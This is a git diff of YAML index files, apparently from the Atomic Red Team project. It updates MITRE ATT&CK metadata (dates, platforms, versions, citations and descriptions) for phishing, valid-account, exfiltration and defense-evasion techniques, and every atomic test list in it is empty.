       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -59339,9 +60243,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -59359,7 +60263,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -59397,11 +60305,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -59418,7 +60325,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -59428,7 +60334,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -59437,19 +60343,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -59497,11 +60401,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -59521,10 +60426,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -59557,7 +60460,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -59596,7 +60498,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59611,7 +60513,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -59691,11 +60592,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59751,11 +60651,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -59816,8 +60715,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -59845,13 +60744,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -59891,8 +60789,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -59900,13 +60800,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -59937,14 +60837,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60011,11 +60908,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60067,15 +60963,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60099,10 +60994,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60121,13 +61015,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60166,9 +61059,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60218,7 +61110,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60238,7 +61129,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60258,8 +61149,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -60306,7 +61195,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -60326,7 +61214,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60348,8 +61236,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -60403,7 +61289,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -60428,7 +61313,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -60463,12 +61348,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60493,11 +61376,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -60540,9 +61422,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -60589,7 +61470,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -60615,7 +61495,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60648,13 +61528,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -60703,12 +61581,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -60744,12 +61621,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -60758,7 +61634,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -60782,9 +61657,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -60807,7 +61681,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -60829,8 +61703,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -60881,7 +61753,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -60931,7 +61802,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -60956,7 +61826,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -60979,13 +61849,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61026,9 +61894,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61076,7 +61943,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61098,7 +61964,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61122,12 +61988,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61191,6 +62055,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/iaas_aws-index.yaml b/atomics/Indexes/iaas_aws-index.yaml
index 6bc8c6df5f..ecaec68168 100644
--- a/atomics/Indexes/iaas_aws-index.yaml
+++ b/atomics/Indexes/iaas_aws-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
